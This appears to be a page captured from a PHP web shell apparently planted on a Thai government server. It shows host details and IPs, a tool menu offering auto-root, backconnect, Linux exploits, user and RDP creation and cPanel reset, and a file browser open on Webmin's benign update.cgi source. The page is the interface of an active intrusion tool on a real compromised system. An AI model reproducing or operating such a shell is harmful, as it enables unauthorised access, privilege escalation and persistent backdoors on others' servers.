Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
webmin /
package-updates /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
newfeatures
[ DIR ]
drwxr-xr-x
CHANGELOG
406
B
-rw-r--r--
config
31
B
-rw-r--r--
config.info
145
B
-rw-r--r--
config.info.ar
253
B
-rw-r--r--
config.info.ca
171
B
-rw-r--r--
config.info.ca.UTF-8
172
B
-rw-r--r--
config.info.de
186
B
-rw-r--r--
config.info.de.UTF-8
186
B
-rw-r--r--
config.info.hu
0
B
-rw-r--r--
config.info.nl
98
B
-rw-r--r--
config.info.nl.UTF-8
98
B
-rw-r--r--
config.info.no
93
B
-rw-r--r--
config.info.no.UTF-8
93
B
-rw-r--r--
config.info.pl
103
B
-rw-r--r--
config.info.pl.UTF-8
111
B
-rw-r--r--
config.info.ru.UTF-8
186
B
-rw-r--r--
config.info.ru_RU
106
B
-rw-r--r--
config.info.ru_RU.UTF-8
186
B
-rw-r--r--
config.info.ru_SU
106
B
-rw-r--r--
create_repo.cgi
332
B
-rwxr-xr-x
index.cgi
7.57
KB
-rwxr-xr-x
install_check.pl
372
B
-rwxr-xr-x
log_parser.pl
742
B
-rw-r--r--
module.info
272
B
-rw-r--r--
module.info.ar
173
B
-rw-r--r--
module.info.ca
156
B
-rw-r--r--
module.info.ca.UTF-8
169
B
-rw-r--r--
module.info.de
126
B
-rw-r--r--
module.info.de.UTF-8
138
B
-rw-r--r--
module.info.hu
36
B
-rw-r--r--
module.info.hu.UTF-8
44
B
-rw-r--r--
module.info.ms_MY
152
B
-rw-r--r--
module.info.ms_MY.UTF-8
164
B
-rw-r--r--
module.info.nl
34
B
-rw-r--r--
module.info.nl.UTF-8
40
B
-rw-r--r--
module.info.no
38
B
-rw-r--r--
module.info.no.UTF-8
44
B
-rw-r--r--
module.info.pl
151
B
-rw-r--r--
module.info.pl.UTF-8
169
B
-rw-r--r--
package-updates-lib.pl
20.58
KB
-rw-r--r--
postinstall.pl
305
B
-rw-r--r--
save_repos.cgi
1.55
KB
-rwxr-xr-x
save_sched.cgi
1.52
KB
-rwxr-xr-x
save_view.cgi
386
B
-rwxr-xr-x
update.cgi
4.69
KB
-rwxr-xr-x
update.pl
1.93
KB
-rwxr-xr-x
view.cgi
2.38
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : update.cgi
#!/usr/bin/perl # Update selected packages require './package-updates-lib.pl'; &ReadParse(); if ($in{'redir'}) { $redir = $in{'redir'}; $redirdesc = $in{'redirdesc'}; } elsif ($in{'redirdesc'}) { $redir = "javascript:history.back()"; $redirdesc = $in{'redirdesc'}; } else { $redir = "index.cgi?mode=".&urlize($in{'mode'}). "&search=".&urlize($in{'search'}); $redirdesc = $text{'index_return'}; } if ($in{'refresh'} || $in{refresh_top}) { &ui_print_unbuffered_header(undef, $text{'refresh_title'}, ""); # Clear all caches print $text{'refresh_clearing'},"<br>\n"; &flush_package_caches(); &clear_repository_cache(); print $text{'refresh_done'},"<p>\n"; # Force re-fetch print $text{'refresh_available'},"<br>\n"; @avail = &list_possible_updates(); print &text('refresh_done3', scalar(@avail)),"<p>\n"; &webmin_log("refresh"); &ui_print_footer($redir, $redirdesc); } else { # Upgrade some packages my @pkgs = split(/\0/, $in{'u'}); @pkgs || &error($text{'update_enone'}); &ui_print_unbuffered_header(undef, $in{'mode'} eq 'new' ? $text{'update_title2'} : $text{'update_title'}, ""); # Save this CGI from being killed by a webmin or apache upgrade $SIG{'TERM'} = 'IGNORE'; $SIG{'PIPE'} = 'IGNORE'; # Work out what will be done, if possible @ops = ( ); if (!$in{'confirm'}) { print $text{'update_ops'},"<p>\n"; @pkgnames = ( ); foreach my $ps (@pkgs) { ($p, $s) = split(/\//, $ps); push(@pkgnames, $p); } @ops = &list_package_operations(join(" ", @pkgnames), $s); } if (@ops) { # Ask first print &ui_form_start("update.cgi", "post"); print &ui_hidden("mode", $in{'mode'}); print &ui_hidden("search", $in{'search'}); print &ui_hidden("redir", $in{'redir'}); print &ui_hidden("redirdesc", $in{'redirdesc'}); foreach $ps (@pkgs) { print &ui_hidden("u", $ps); } print &text('update_rusure', scalar(@ops)),"<p>\n"; print &ui_form_end([ [ "confirm", $text{'update_confirm'} ] ]); # Show table of all depends @current = &list_current(1); print &ui_columns_start([ $text{'index_name'}, $text{'update_oldver'}, $text{'update_newver'}, $text{'index_desc'}, ], 100); foreach $p (@ops) { ($c) = grep { $_->{'name'} eq $p->{'name'} && $_->{'system'} eq $p->{'system'} } @current; if (!$c && !@avail) { # Only get available if needed @avail = &list_available(0); } ($a) = grep { $_->{'name'} eq $p->{'name'} && $_->{'system'} eq $p->{'system'} } @avail; print &ui_columns_row([ $p->{'name'}, $c ? $c->{'version'} : "<i>$text{'update_none'}</i>", $p->{'version'}, $c ? $c->{'desc'} : $a ? $a->{'desc'} : '', ]); } print &ui_columns_end(); } else { # Check if a reboot was required before $reboot_before = &check_reboot_required(0); # Do it $msg = $in{'mode'} eq 'new' ? 'update_pkg2' : 'update_pkg'; &start_update_progress([ map { (split(/\//, $_))[0] } @pkgs ]); if ($config{'update_multiple'} && @pkgs > 1) { # Update all packages at once @pkgnames = ( ); foreach my $ps (@pkgs) { ($p, $s) = split(/\//, $ps); push(@pkgnames, $p); $pkgsystem ||= $s; } print &text($msg, "<tt>".join(" ", @pkgnames)."</tt>"), "<br>\n"; print "<ul>\n"; @got = &package_install_multiple( \@pkgnames, $pkgsystem, $in{'mode'} eq 'new'); print "</ul><br>\n"; } else { # Do them one by one in a loop foreach my $ps (@pkgs) { ($p, $s) = split(/\//, $ps); next if ($donedep{$p}); print &text($msg, "<tt>$p</tt>"),"<br>\n"; print "<ul>\n"; @pgot = &package_install( $p, $s, $in{'mode'} eq 'new'); foreach $g (@pgot) { $donedep{$g}++; } push(@got, @pgot); print "</ul><br>\n"; } } if (@got) { print &text('update_ok', scalar(@got)),"<p>\n"; } else { print $text{'update_failed'},"<p>\n"; } &end_update_progress(\@pkgs); # Refresh collected package info if (&foreign_check("system-status")) { &foreign_require("system-status"); &system_status::refresh_possible_packages(\@got); } # Refresh collected package info if (&foreign_check("virtual-server") && @got) { &foreign_require("virtual-server"); &virtual_server::refresh_possible_packages(\@got); } # Check if a reboot is required now if (!$reboot_before && &check_reboot_required(1) && &foreign_check("init")) { print &ui_form_start( "$gconfig{'webprefix'}/init/reboot.cgi"); print &ui_hidden("confirm", 1); print "<b>",$text{'update_rebootdesc'},"</b><p>\n"; print &ui_form_end( [ [ undef, $text{'update_reboot'} ] ]); } &webmin_log("update", "packages", scalar(@got), { 'got' => \@got }); } &ui_print_footer($redir, $redirdesc); }
Close